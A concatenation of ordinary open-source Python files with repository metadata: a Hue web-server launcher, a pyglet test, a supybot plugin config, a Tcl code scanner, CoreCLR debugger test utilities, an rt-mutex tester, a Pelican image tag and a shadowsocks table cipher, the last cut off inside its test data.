# limitations under the License.
import desktop.lib.eventlet_util
import logging
import os
import sys
from django.core.management.base import BaseCommand
from desktop import conf
import spawning.spawning_controller
from desktop.lib.daemon_utils import drop_privileges_if_necessary
from django.utils.translation import ugettext as _
SPAWNING_SERVER_HELP = r"""
Run Hue using the Spawning WSGI server in asynchronous mode.
"""
SPAWNING_SERVER_OPTIONS = {
'access_log_file': os.devnull,
'backdoor': None,
'chuid': None,
'coverage': None,
'daemonize': None,
'deadman_timeout': 1,
'factory': 'spawning.django_factory.config_factory',
'host': conf.HTTP_HOST.get(),
'max_age': None,
'max_memory': 0,
'no_keepalive': None,
'pidfile': None,
'port': conf.HTTP_PORT.get(),
'processes': 1,
'reload': None,
'restart_args': None,
'server_user': conf.SERVER_USER.get(),
'server_group': conf.SERVER_GROUP.get(),
'ssl_certificate': conf.SSL_CERTIFICATE.get(),
'ssl_private_key': conf.SSL_PRIVATE_KEY.get(),
'status_host': '',
'status_port': 0,
'stderr': None,
'stdout': None,
'sysinfo': None,
'threads': 0,
'verbose': None,
'watch': None
}
LOG = logging.getLogger(__name__)
class Command(BaseCommand):
help = _("Spawning Server for Hue.")
def handle(self, *args, **options):
from django.conf import settings
from django.utils import translation
if not conf.ENABLE_SERVER.get():
LOG.info("Hue is configured to not start its own web server.")
sys.exit(0)
# Activate the current language, because it won't get activated later.
try:
translation.activate(settings.LANGUAGE_CODE)
except AttributeError:
pass
runspawningserver()
def usage(self, subcommand):
return SPAWNING_SERVER_HELP
def runspawningserver():
try:
sock = spawning.spawning_controller.bind_socket(SPAWNING_SERVER_OPTIONS)
except Exception, ex:
LOG.error('Could not bind port %s: %s. Exiting' % (str(SPAWNING_SERVER_OPTIONS['port']), ex,))
return
drop_privileges_if_necessary(SPAWNING_SERVER_OPTIONS)
factory = SPAWNING_SERVER_OPTIONS['factory']
pos_args = ['desktop.settings']
argv_str_format = '--factory=%s %s --port %s -s %d -t %d'
argv_str = argv_str_format % (SPAWNING_SERVER_OPTIONS['factory'],
pos_args[0],
SPAWNING_SERVER_OPTIONS['port'],
SPAWNING_SERVER_OPTIONS['processes'],
SPAWNING_SERVER_OPTIONS['threads'])
factory_args = {
'access_log_file': SPAWNING_SERVER_OPTIONS['access_log_file'],
'args': pos_args,
'argv_str': argv_str,
'coverage': SPAWNING_SERVER_OPTIONS['coverage'],
'deadman_timeout': SPAWNING_SERVER_OPTIONS['deadman_timeout'],
'host': SPAWNING_SERVER_OPTIONS['host'],
'max_age' : SPAWNING_SERVER_OPTIONS['max_age'],
'no_keepalive' : SPAWNING_SERVER_OPTIONS['no_keepalive'],
'num_processes': SPAWNING_SERVER_OPTIONS['processes'],
'pidfile': SPAWNING_SERVER_OPTIONS['pidfile'],
'port': SPAWNING_SERVER_OPTIONS['port'],
'reload': SPAWNING_SERVER_OPTIONS['reload'],
'ssl_certificate': SPAWNING_SERVER_OPTIONS['ssl_certificate'],
'ssl_private_key': SPAWNING_SERVER_OPTIONS['ssl_private_key'],
'status_host': SPAWNING_SERVER_OPTIONS['status_host'] or SPAWNING_SERVER_OPTIONS['host'],
'status_port': SPAWNING_SERVER_OPTIONS['status_port'],
'sysinfo': SPAWNING_SERVER_OPTIONS['sysinfo'],
'threadpool_workers': SPAWNING_SERVER_OPTIONS['threads'],
'verbose': SPAWNING_SERVER_OPTIONS['verbose'],
'watch': SPAWNING_SERVER_OPTIONS['watch']
}
os.environ['HUE_SPAWNING'] = 'yes'
spawning.spawning_controller.start_controller(sock, factory, factory_args)
if __name__ == '__main__':
runspawningserver()
|
apache-2.0
|
theblacklion/pyglet
|
contrib/scene2d/tests/scene2d/VIEW_SUBWINDOW.py
|
29
|
1420
|
#!/usr/bin/env python
'''Testing flat map allow_oob enforcement.
Press 0-9 to set the size of the view in the window (1=10%, 0=100%)
Press arrow keys to move view focal point (little ball) around map.
Press "o" to turn allow_oob on and off.
You should see no black border with allow_oob=False.
Press escape or close the window to finish the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import unittest
from render_base import RenderBase
import scene2d
from pyglet.event import *
from pyglet.window.event import *
from pyglet.window import key
from scene2d.debug import gen_rect_map
class OOBTest(RenderBase):
def test_main(self):
self.init_window(256, 256)
self.set_map(gen_rect_map([[{}]*10]*10, 32, 32))
@event(self.w)
def on_text(text):
if text == 'o':
self.view.allow_oob = not self.view.allow_oob
print 'NOTE: allow_oob =', self.view.allow_oob
return
try:
size = int(25.6 * float(text))
if size == 0: size = 256
c = self.view.camera
c.width = c.height = size
c.x = c.y = (256-size)/2
except:
return EVENT_UNHANDLED
print 'NOTE: allow_oob =', self.view.allow_oob
self.show_focus()
self.run_test()
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
jrabbit/ubotu-fr
|
plugins/Format/config.py
|
15
|
2357
|
###
# Copyright (c) 2004, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.conf as conf
import supybot.registry as registry
def configure(advanced):
# This will be called by supybot to configure this module. advanced is
# a bool that specifies whether the user identified himself as an advanced
# user or not. You should effect your configuration by manipulating the
# registry as appropriate.
from supybot.questions import expect, anything, something, yn
conf.registerPlugin('Format', True)
Format = conf.registerPlugin('Format')
# This is where your configuration variables (if any) should go. For example:
# conf.registerGlobalValue(Format, 'someConfigVariableName',
# registry.Boolean(False, """Help for someConfigVariableName."""))
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79
|
bsd-3-clause
|
dostavro/dotfiles
|
sublime2/Packages/SublimeCodeIntel/libs/codeintel2/tclcile.py
|
2
|
8476
|
#!/usr/bin/env python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is Komodo code.
#
# The Initial Developer of the Original Code is ActiveState Software Inc.
# Portions created by ActiveState Software Inc are Copyright (C) 2000-2007
# ActiveState Software Inc. All Rights Reserved.
#
# Contributor(s):
# ActiveState Software Inc
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
#
# Contributors:
# Eric Promislow ([email protected])
"""
tclcile - a Code Intelligence Language Engine for the Tcl language
Module Usage:
from tclcile import scan_purelang
content = open("foo.tcl", "r").read()
scan_purelang(content, "foo.tcl")
Command-line Usage:
tclcile.py [<options>...] [<Tcl files>...]
Options:
-h, --help dump this help and exit
-V, --version dump this script's version and exit
-v, --verbose verbose output, use twice for more verbose output
-f, --filename <path> specify the filename of the file content
passed in on stdin, this is used for the "path"
attribute of the emitted <file> tag.
--md5=<string> md5 hash for the input
--mtime=<secs> modification time for output info, in #secs since
1/1/70.
-L, --language <name>
the language of the file being scanned
-c, --clock print timing info for scans (CIX is not printed)
One or more Tcl files can be specified as arguments or content can be
passed in on stdin. A directory can also be specified, in which case
all .rb files in that directory are scanned.
This is a Language Engine for the Code Intelligence (codeintel) system.
Code Intelligence XML format. See:
http://specs.tl.activestate.com/kd/kd-0100.html
The command-line interface will return non-zero iff the scan failed.
"""
import os
from os.path import basename, splitext, isfile, isdir, join
import sys
import getopt
from hashlib import md5
import re
import logging
import glob
import time
import stat
from ciElementTree import Element, SubElement, tostring
from SilverCity import ScintillaConstants
from codeintel2 import tcl_lexer, tcl_parser
from codeintel2.common import CILEError
from codeintel2 import parser_cix
#---- exceptions
class TclCILEError(CILEError):
pass
#---- global data
_version_ = (0, 1, 0)
log = logging.getLogger("tclcile")
# log.setLevel(logging.DEBUG)
_gClockIt = 0 # if true then we are gathering timing data
_gClock = None # if gathering timing data this is set to time retrieval fn
_gStartTime = None # start time of current file being scanned
def scan_purelang(content, filename):
content = content.expandtabs(8)
tokenizer = tcl_lexer.TclLexer(content)
parser = tcl_parser.Parser(tokenizer, "Tcl")
parse_tree = parser.parse()
# XXX Change last arg from "Tcl" to "tclcile"?
tree = parser_cix.produce_elementTree_cix(parse_tree, filename, "Tcl",
"Tcl")
return tree
def scan_multilang(tokens, module_elem):
"""Build the Tcl module CIX element tree.
"tokens" is a generator of UDL tokens for this UDL-based
multi-lang document.
"module_elem" is the <module> element of a CIX element tree on
which the Tcl module should be built.
This should return a list of the CSL tokens in the token stream.
"""
tokenizer = tcl_lexer.TclMultiLangLexer(tokens)
parser = tcl_parser.Parser(tokenizer, "AOL") # TODO: What is AOL here?
parse_tree = parser.parse()
parser_cix.produce_elementTree_contents_cix(parse_tree, module_elem)
csl_tokens = tokenizer.get_csl_tokens()
return csl_tokens
#---- mainline
def main(argv):
logging.basicConfig()
# Parse options.
try:
opts, args = getopt.getopt(argv[1:], "Vvhf:cL:",
["version", "verbose", "help", "filename=", "md5=", "mtime=",
"clock", "language="])
except getopt.GetoptError, ex:
log.error(str(ex))
log.error("Try `tclcile --help'.")
return 1
numVerboses = 0
stdinFilename = None
md5sum = None
mtime = None
lang = "Tcl"
global _gClockIt
for opt, optarg in opts:
if opt in ("-h", "--help"):
sys.stdout.write(__doc__)
return
elif opt in ("-V", "--version"):
ver = '.'.join([str(part) for part in _version_])
print "tclcile %s" % ver
return
elif opt in ("-v", "--verbose"):
numVerboses += 1
if numVerboses == 1:
log.setLevel(logging.INFO)
else:
log.setLevel(logging.DEBUG)
elif opt in ("-f", "--filename"):
stdinFilename = optarg
elif opt in ("-L", "--language"):
lang = optarg
elif opt in ("--md5",):
md5sum = optarg
elif opt in ("--mtime",):
mtime = optarg
elif opt in ("-c", "--clock"):
_gClockIt = 1
global _gClock
if sys.platform.startswith("win"):
_gClock = time.clock
else:
_gClock = time.time
if len(args) == 0:
contentOnStdin = 1
filenames = [stdinFilename or "<stdin>"]
else:
contentOnStdin = 0
paths = []
for arg in args:
paths += glob.glob(arg)
filenames = []
for path in paths:
if isfile(path):
filenames.append(path)
elif isdir(path):
rbfiles = [join(path, n) for n in os.listdir(path)
if splitext(n)[1] == ".rb"]
rbfiles = [f for f in rbfiles if isfile(f)]
filenames += rbfiles
try:
for filename in filenames:
if contentOnStdin:
log.debug("reading content from stdin")
content = sys.stdin.read()
log.debug("finished reading content from stdin")
if mtime is None:
mtime = int(time.time())
else:
if mtime is None:
mtime = int(os.stat(filename)[stat.ST_MTIME])
content = open(filename, 'r').read()
if _gClockIt:
sys.stdout.write("scanning '%s'..." % filename)
global _gStartTime
_gStartTime = _gClock()
data = tostring(scan_purelang(content, filename))
if _gClockIt:
sys.stdout.write(" %.3fs\n" % (_gClock()-_gStartTime))
elif data:
sys.stdout.write(data)
except KeyboardInterrupt:
log.debug("user abort")
return 1
if 0: # except Exception, ex:
log.error(str(ex))
if log.isEnabledFor(logging.DEBUG):
print
import traceback
traceback.print_exception(*sys.exc_info())
return 1
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
mit
|
ruben-ayrapetyan/coreclr
|
src/ToolBox/SOS/tests/testutils.py
|
43
|
5438
|
from __future__ import print_function
import lldb
import re
import inspect
import sys
import os
import importlib
summary_file = ''
fail_flag = ''
failed = False
def assertCommon(passed, fatal):
global failed
with open(summary_file, 'a+') as summary:
print(bool(passed), file=summary)
if (not passed):
failed = True
print('!!! test failed:', file=summary)
for s in inspect.stack()[2:]:
print("!!! %s:%i" % (s[1], s[2]), file=summary)
print("!!! %s" % s[4][0], file=summary)
if re.match('\W*t_\w+\.py$', s[1]):
break
print('!!! ', file=summary)
if fatal:
exit(1)
def assertTrue(x, fatal=True):
passed = bool(x)
assertCommon(passed, fatal)
def assertFalse(x, fatal=True):
passed = not bool(x)
assertCommon(passed, fatal)
def assertEqual(x, y, fatal=True):
passed = (x == y)
if not passed:
print(str(x), ' != ', str(y))
assertCommon(passed, fatal)
def assertNotEqual(x, y, fatal=True):
passed = (x != y)
if not passed:
print(str(x), ' == ', str(y))
assertCommon(passed, fatal)
def checkResult(res):
if not res.Succeeded():
print(res.GetOutput())
print(res.GetError())
exit(1)
def is_hexnum(s):
try:
int(s, 16)
return True
except ValueError:
return False
def exec_and_find(commandInterpreter, cmd, regexp):
res = lldb.SBCommandReturnObject()
commandInterpreter.HandleCommand(cmd, res)
checkResult(res)
expr = re.compile(regexp)
addr = None
print(res.GetOutput())
lines = res.GetOutput().splitlines()
for line in lines:
match = expr.match(line)
if match:
addr = match.group(1)
break
print("Found addr: " + str(addr))
return addr
def stop_in_main(debugger, assembly):
ci = debugger.GetCommandInterpreter()
target = debugger.GetSelectedTarget()
process = target.GetProcess()
res = lldb.SBCommandReturnObject()
# Process must be stopped here while libcoreclr loading.
# This test usually fails on release version of coreclr
# since we depend on 'LoadLibraryExW' symbol present.
assertEqual(process.GetState(), lldb.eStateStopped)
# The reason of this stop must be a breakpoint
assertEqual(process.GetSelectedThread().GetStopReason(),
lldb.eStopReasonBreakpoint)
ci.HandleCommand("bpmd " + assembly + " Test.Main", res)
out_msg = res.GetOutput()
err_msg = res.GetError()
print(res.GetOutput())
print(res.GetError())
# Interpreter must have this command and able to run it
assertTrue(res.Succeeded())
# Output is not empty
# Should be at least 'Adding pending breakpoints...'
assertTrue(len(out_msg) > 0)
# Error message is empty
assertTrue(len(err_msg) == 0)
process.Continue()
# Process must be stopped here if bpmd works at all
assertEqual(process.GetState(), lldb.eStateStopped)
# The reason of this stop must be a breakpoint
assertEqual(process.GetSelectedThread().GetStopReason(),
lldb.eStopReasonBreakpoint)
def exit_lldb(debugger, assembly):
ci = debugger.GetCommandInterpreter()
target = debugger.GetSelectedTarget()
process = target.GetProcess()
res = lldb.SBCommandReturnObject()
ci.HandleCommand("breakpoint delete --force", res)
out_msg = res.GetOutput()
err_msg = res.GetError()
print(out_msg)
print(err_msg)
# Interpreter must have this command and able to run it
# assertTrue(res.Succeeded())
process.Continue()
# Process must exit
assertEqual(process.GetState(), lldb.eStateExited)
# Process must exit with zero code
assertEqual(process.GetExitStatus(), 0)
def get_methoddesc(debugger, assembly, funcname):
ci = debugger.GetCommandInterpreter()
target = debugger.GetSelectedTarget()
process = target.GetProcess()
res = lldb.SBCommandReturnObject()
ci.HandleCommand("name2ee %s %s" % (assembly, funcname), res)
print(res.GetOutput())
print(res.GetError())
# Interpreter must have this command and able to run it
assertTrue(res.Succeeded())
output = res.GetOutput()
# Output is not empty
assertTrue(len(output) > 0)
match = re.search('MethodDesc:\s+([0-9a-fA-F]+)', output)
# Line matched
assertTrue(match)
groups = match.groups()
# Match has a single subgroup
assertEqual(len(groups), 1)
md_addr = groups[0]
# Address must be a hex number
assertTrue(is_hexnum(md_addr))
return md_addr
def run(assembly, module):
with open(summary_file, 'a+') as summary:
print('new_suite: %s' % module, file=summary)
debugger = lldb.debugger
debugger.SetAsync(False)
target = lldb.target
debugger.HandleCommand("breakpoint set --one-shot --name coreclr_execute_assembly")
debugger.HandleCommand("process launch")
# run the scenario
print("starting scenario...")
i = importlib.import_module(module)
scenarioResult = i.runScenario(os.path.basename(assembly), debugger,
target)
if (target.GetProcess().GetExitStatus() == 0) and not failed:
os.unlink(fail_flag)
with open(summary_file, 'a+') as summary:
print('Completed!', file=summary)
|
mit
|
sbreen94/Zeus_D2vzw
|
scripts/rt-tester/rt-tester.py
|
11005
|
5307
|
#!/usr/bin/python
#
# rt-mutex tester
#
# (C) 2006 Thomas Gleixner <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
import os
import sys
import getopt
import shutil
import string
# Globals
quiet = 0
test = 0
comments = 0
sysfsprefix = "/sys/devices/system/rttest/rttest"
statusfile = "/status"
commandfile = "/command"
# Command opcodes
cmd_opcodes = {
"schedother" : "1",
"schedfifo" : "2",
"lock" : "3",
"locknowait" : "4",
"lockint" : "5",
"lockintnowait" : "6",
"lockcont" : "7",
"unlock" : "8",
"signal" : "11",
"resetevent" : "98",
"reset" : "99",
}
test_opcodes = {
"prioeq" : ["P" , "eq" , None],
"priolt" : ["P" , "lt" , None],
"priogt" : ["P" , "gt" , None],
"nprioeq" : ["N" , "eq" , None],
"npriolt" : ["N" , "lt" , None],
"npriogt" : ["N" , "gt" , None],
"unlocked" : ["M" , "eq" , 0],
"trylock" : ["M" , "eq" , 1],
"blocked" : ["M" , "eq" , 2],
"blockedwake" : ["M" , "eq" , 3],
"locked" : ["M" , "eq" , 4],
"opcodeeq" : ["O" , "eq" , None],
"opcodelt" : ["O" , "lt" , None],
"opcodegt" : ["O" , "gt" , None],
"eventeq" : ["E" , "eq" , None],
"eventlt" : ["E" , "lt" , None],
"eventgt" : ["E" , "gt" , None],
}
# Print usage information
def usage():
print "rt-tester.py <-c -h -q -t> <testfile>"
print " -c display comments after first command"
print " -h help"
print " -q quiet mode"
print " -t test mode (syntax check)"
print " testfile: read test specification from testfile"
print " otherwise from stdin"
return
# Print progress when not in quiet mode
def progress(str):
if not quiet:
print str
# Analyse a status value
def analyse(val, top, arg):
intval = int(val)
if top[0] == "M":
intval = intval / (10 ** int(arg))
intval = intval % 10
argval = top[2]
elif top[0] == "O":
argval = int(cmd_opcodes.get(arg, arg))
else:
argval = int(arg)
# progress("%d %s %d" %(intval, top[1], argval))
if top[1] == "eq" and intval == argval:
return 1
if top[1] == "lt" and intval < argval:
return 1
if top[1] == "gt" and intval > argval:
return 1
return 0
# Parse the commandline
try:
(options, arguments) = getopt.getopt(sys.argv[1:],'chqt')
except getopt.GetoptError, ex:
usage()
sys.exit(1)
# Parse commandline options
for option, value in options:
if option == "-c":
comments = 1
elif option == "-q":
quiet = 1
elif option == "-t":
test = 1
elif option == '-h':
usage()
sys.exit(0)
# Select the input source
if arguments:
try:
fd = open(arguments[0])
except Exception,ex:
sys.stderr.write("File not found %s\n" %(arguments[0]))
sys.exit(1)
else:
fd = sys.stdin
linenr = 0
# Read the test patterns
while 1:
linenr = linenr + 1
line = fd.readline()
if not len(line):
break
line = line.strip()
parts = line.split(":")
if not parts or len(parts) < 1:
continue
if len(parts[0]) == 0:
continue
if parts[0].startswith("#"):
if comments > 1:
progress(line)
continue
if comments == 1:
comments = 2
progress(line)
cmd = parts[0].strip().lower()
opc = parts[1].strip().lower()
tid = parts[2].strip()
dat = parts[3].strip()
try:
# Test or wait for a status value
if cmd == "t" or cmd == "w":
testop = test_opcodes[opc]
fname = "%s%s%s" %(sysfsprefix, tid, statusfile)
if test:
print fname
continue
while 1:
query = 1
fsta = open(fname, 'r')
status = fsta.readline().strip()
fsta.close()
stat = status.split(",")
for s in stat:
s = s.strip()
if s.startswith(testop[0]):
# Separate status value
val = s[2:].strip()
query = analyse(val, testop, dat)
break
if query or cmd == "t":
break
progress(" " + status)
if not query:
sys.stderr.write("Test failed in line %d\n" %(linenr))
sys.exit(1)
# Issue a command to the tester
elif cmd == "c":
cmdnr = cmd_opcodes[opc]
# Build command string and sys filename
cmdstr = "%s:%s" %(cmdnr, dat)
fname = "%s%s%s" %(sysfsprefix, tid, commandfile)
if test:
print fname
continue
fcmd = open(fname, 'w')
fcmd.write(cmdstr)
fcmd.close()
except Exception,ex:
sys.stderr.write(str(ex))
sys.stderr.write("\nSyntax error in line %d\n" %(linenr))
if not test:
fd.close()
sys.exit(1)
# Normal exit pass
print "Pass"
sys.exit(0)
|
gpl-2.0
|
s40523222/2016fallcp_hw
|
plugin/liquid_tags/img.py
|
26
|
2465
|
"""
Image Tag
---------
This implements a Liquid-style image tag for Pelican,
based on the octopress image tag [1]_
Syntax
------
{% img [class name(s)] [http[s]:/]/path/to/image [width [height]] [title text | "title text" ["alt text"]] %}
Examples
--------
{% img /images/ninja.png Ninja Attack! %}
{% img left half http://site.com/images/ninja.png Ninja Attack! %}
{% img left half http://site.com/images/ninja.png 150 150 "Ninja Attack!" "Ninja in attack posture" %}
Output
------
<img src="/images/ninja.png">
<img class="left half" src="http://site.com/images/ninja.png" title="Ninja Attack!" alt="Ninja Attack!">
<img class="left half" src="http://site.com/images/ninja.png" width="150" height="150" title="Ninja Attack!" alt="Ninja in attack posture">
[1] https://github.com/imathis/octopress/blob/master/plugins/image_tag.rb
"""
import re
from .mdx_liquid_tags import LiquidTags
import six
SYNTAX = '{% img [class name(s)] [http[s]:/]/path/to/image [width [height]] [title text | "title text" ["alt text"]] %}'
# Regular expression to match the entire syntax
ReImg = re.compile("""(?P<class>\S.*\s+)?(?P<src>(?:https?:\/\/|\/|\S+\/)\S+)(?:\s+(?P<width>\d+))?(?:\s+(?P<height>\d+))?(?P<title>\s+.+)?""")
# Regular expression to split the title and alt text
ReTitleAlt = re.compile("""(?:"|')(?P<title>[^"']+)?(?:"|')\s+(?:"|')(?P<alt>[^"']+)?(?:"|')""")
@LiquidTags.register('img')
def img(preprocessor, tag, markup):
attrs = None
# Parse the markup string
match = ReImg.search(markup)
if match:
attrs = dict([(key, val.strip())
for (key, val) in six.iteritems(match.groupdict()) if val])
else:
raise ValueError('Error processing input. '
'Expected syntax: {0}'.format(SYNTAX))
# Check if alt text is present -- if so, split it from title
if 'title' in attrs:
match = ReTitleAlt.search(attrs['title'])
if match:
attrs.update(match.groupdict())
if not attrs.get('alt'):
attrs['alt'] = attrs['title']
# Return the formatted text
return "<img {0}>".format(' '.join('{0}="{1}"'.format(key, val)
for (key, val) in six.iteritems(attrs)))
#----------------------------------------------------------------------
# This import allows image tag to be a Pelican plugin
from .liquid_tags import register
|
agpl-3.0
|
naturs/shadowsocks
|
shadowsocks/crypto/table.py
|
1044
|
8108
|
# !/usr/bin/env python
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import string
import struct
import hashlib
__all__ = ['ciphers']
cached_tables = {}
if hasattr(string, 'maketrans'):
maketrans = string.maketrans
translate = string.translate
else:
maketrans = bytes.maketrans
translate = bytes.translate
def get_table(key):
m = hashlib.md5()
m.update(key)
s = m.digest()
a, b = struct.unpack('<QQ', s)
table = maketrans(b'', b'')
table = [table[i: i + 1] for i in range(len(table))]
for i in range(1, 1024):
table.sort(key=lambda x: int(a % (ord(x) + i)))
return table
def init_table(key):
if key not in cached_tables:
encrypt_table = b''.join(get_table(key))
decrypt_table = maketrans(encrypt_table, maketrans(b'', b''))
cached_tables[key] = [encrypt_table, decrypt_table]
return cached_tables[key]
class TableCipher(object):
def __init__(self, cipher_name, key, iv, op):
self._encrypt_table, self._decrypt_table = init_table(key)
self._op = op
def update(self, data):
if self._op:
return translate(data, self._encrypt_table)
else:
return translate(data, self._decrypt_table)
ciphers = {
'table': (0, 0, TableCipher)
}
def test_table_result():
from shadowsocks.common import ord
target1 = [
[60, 53, 84, 138, 217, 94, 88, 23, 39, 242, 219, 35, 12, 157, 165, 181,
255, 143, 83, 247, 162, 16, 31, 209, 190, 171, 115, 65, 38, 41, 21,
245, 236, 46, 121, 62, 166, 233, 44, 154, 153, 145, 230, 49, 128, 216,
173, 29, 241, 119, 64, 229, 194, 103, 131, 110, 26, 197, 218, 59, 204,
56, 27, 34, 141, 221, 149, 239, 192, 195, 24, 155, 170, 183, 11, 254,
213, 37, 137, 226, 75, 203, 55, 19, 72, 248, 22, 129, 33, 175, 178,
10, 198, 71, 77, 36, 113, 167, 48, 2, 117, 140, 142, 66, 199, 232,
243, 32, 123, 54, 51, 82, 57, 177, 87, 251, 150, 196, 133, 5, 253,
130, 8, 184, 14, 152, 231, 3, 186, 159, 76, 89, 228, 205, 156, 96,
163, 146, 18, 91, 132, 85, 80, 109, 172, 176, 105, 13, 50, 235, 127,
0, 189, 95, 98, 136, 250, 200, 108, 179, 211, 214, 106, 168, 78, 79,
74, 210, 30, 73, 201, 151, 208, 114, 101, 174, 92, 52, 120, 240, 15,
169, 220, 182, 81, 224, 43, 185, 40, 99, 180, 17, 212, 158, 42, 90, 9,
191, 45, 6, 25, 4, 222, 67, 126, 1, 116, 124, 206, 69, 61, 7, 68, 97,
202, 63, 244, 20, 28, 58, 93, 134, 104, 144, 227, 147, 102, 118, 135,
148, 47, 238, 86, 112, 122, 70, 107, 215, 100, 139, 223, 225, 164,
237, 111, 125, 207, 160, 187, 246, 234, 161, 188, 193, 249, 252],
[151, 205, 99, 127, 201, 119, 199, 211, 122, 196, 91, 74, 12, 147, 124,
180, 21, 191, 138, 83, 217, 30, 86, 7, 70, 200, 56, 62, 218, 47, 168,
22, 107, 88, 63, 11, 95, 77, 28, 8, 188, 29, 194, 186, 38, 198, 33,
230, 98, 43, 148, 110, 177, 1, 109, 82, 61, 112, 219, 59, 0, 210, 35,
215, 50, 27, 103, 203, 212, 209, 235, 93, 84, 169, 166, 80, 130, 94,
164, 165, 142, 184, 111, 18, 2, 141, 232, 114, 6, 131, 195, 139, 176,
220, 5, 153, 135, 213, 154, 189, 238, 174, 226, 53, 222, 146, 162,
236, 158, 143, 55, 244, 233, 96, 173, 26, 206, 100, 227, 49, 178, 34,
234, 108, 207, 245, 204, 150, 44, 87, 121, 54, 140, 118, 221, 228,
155, 78, 3, 239, 101, 64, 102, 17, 223, 41, 137, 225, 229, 66, 116,
171, 125, 40, 39, 71, 134, 13, 193, 129, 247, 251, 20, 136, 242, 14,
36, 97, 163, 181, 72, 25, 144, 46, 175, 89, 145, 113, 90, 159, 190,
15, 183, 73, 123, 187, 128, 248, 252, 152, 24, 197, 68, 253, 52, 69,
117, 57, 92, 104, 157, 170, 214, 81, 60, 133, 208, 246, 172, 23, 167,
160, 192, 76, 161, 237, 45, 4, 58, 10, 182, 65, 202, 240, 185, 241,
79, 224, 132, 51, 42, 126, 105, 37, 250, 149, 32, 243, 231, 67, 179,
48, 9, 106, 216, 31, 249, 19, 85, 254, 156, 115, 255, 120, 75, 16]]
target2 = [
[124, 30, 170, 247, 27, 127, 224, 59, 13, 22, 196, 76, 72, 154, 32,
209, 4, 2, 131, 62, 101, 51, 230, 9, 166, 11, 99, 80, 208, 112, 36,
248, 81, 102, 130, 88, 218, 38, 168, 15, 241, 228, 167, 117, 158, 41,
10, 180, 194, 50, 204, 243, 246, 251, 29, 198, 219, 210, 195, 21, 54,
91, 203, 221, 70, 57, 183, 17, 147, 49, 133, 65, 77, 55, 202, 122,
162, 169, 188, 200, 190, 125, 63, 244, 96, 31, 107, 106, 74, 143, 116,
148, 78, 46, 1, 137, 150, 110, 181, 56, 95, 139, 58, 3, 231, 66, 165,
142, 242, 43, 192, 157, 89, 175, 109, 220, 128, 0, 178, 42, 255, 20,
214, 185, 83, 160, 253, 7, 23, 92, 111, 153, 26, 226, 33, 176, 144,
18, 216, 212, 28, 151, 71, 206, 222, 182, 8, 174, 205, 201, 152, 240,
155, 108, 223, 104, 239, 98, 164, 211, 184, 34, 193, 14, 114, 187, 40,
254, 12, 67, 93, 217, 6, 94, 16, 19, 82, 86, 245, 24, 197, 134, 132,
138, 229, 121, 5, 235, 238, 85, 47, 103, 113, 179, 69, 250, 45, 135,
156, 25, 61, 75, 44, 146, 189, 84, 207, 172, 119, 53, 123, 186, 120,
171, 68, 227, 145, 136, 100, 90, 48, 79, 159, 149, 39, 213, 236, 126,
52, 60, 225, 199, 105, 73, 233, 252, 118, 215, 35, 115, 64, 37, 97,
129, 161, 177, 87, 237, 141, 173, 191, 163, 140, 234, 232, 249],
[117, 94, 17, 103, 16, 186, 172, 127, 146, 23, 46, 25, 168, 8, 163, 39,
174, 67, 137, 175, 121, 59, 9, 128, 179, 199, 132, 4, 140, 54, 1, 85,
